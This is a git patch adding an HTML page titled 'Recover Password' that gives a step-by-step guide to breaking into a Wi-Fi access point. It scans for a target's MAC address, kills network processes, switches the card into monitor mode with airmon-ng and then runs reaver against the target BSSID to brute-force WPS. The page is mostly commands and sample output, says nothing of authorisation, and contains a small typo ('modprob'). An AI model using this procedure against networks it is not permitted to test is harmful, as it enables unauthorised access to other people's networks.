From 07bedee34d9ded6f86904c7e4b4e02464ff8cb14 Mon Sep 17 00:00:00 2001 From: Silvino Silva Date: Thu, 15 Sep 2016 00:47:34 +0100 Subject: added tools --- tools/wireless.html | 90 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 tools/wireless.html (limited to 'tools/wireless.html') diff --git a/tools/wireless.html b/tools/wireless.html new file mode 100644 index 0000000..7481069 --- /dev/null +++ b/tools/wireless.html @@ -0,0 +1,90 @@ + + + + Wireless + + +

Wireless

+

Recover Password

+ +

Tested on debian system only.

+ +

First get mac address of the target cell;

+ +
+        # iwlist wlp2s0 scan
+        
+ +

Example output that matter;

+ +
+        Cell 03 - Address: A8:A6:68:98:0C:C5
+        
+ +
+        # airmon-ng check
+
+
+        Found 5 processes that could cause trouble.
+        If airodump-ng, aireplay-ng or airtun-ng stops working after
+        a short period of time, you may want to kill (some of) them!
+
+        PID     Name
+        1271    wpa_supplicant
+        1576    wpa_supplicant
+        1633    dhclient
+        Process with PID 1576 (wpa_supplicant) is running on interface wlan0
+        Process with PID 1633 (dhclient) is running on interface wlan0
+        
+ +

Pkill or kill all of them, ex 1271;

+ +
+        # kill -15 1271
+        
+ +

If that fails;

+ +
+        # kill -9 1271
+        
+ +

Just to be sure that everything is as it should;

+ +
+        # rmmod iwlmvm
+        # rmmod iwlwifi
+        # modprob iwlwifi
+        
+ +

Put interface in monitor mode;

+ +
+        # iwconfig wlp2s0 mode monitor
+        # ifconfig wlp2s0 up
+        
+ +
+        # airmon-ng start wlp2s0
+
+
+        Interface       Chipset         Driver
+
+        wlp2s0           Intel AC        iwlwifi - [phy1]
+                                        (monitor mode enabled on mon0)
+        
+ +

Put mon0 on same channel of target cell;

+ +
+        # iwconfig mon0 channel 6
+        
+ +

Start the magic;

+ +
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv
+        
+ + + -- cgit 1.4.1-2-gfad0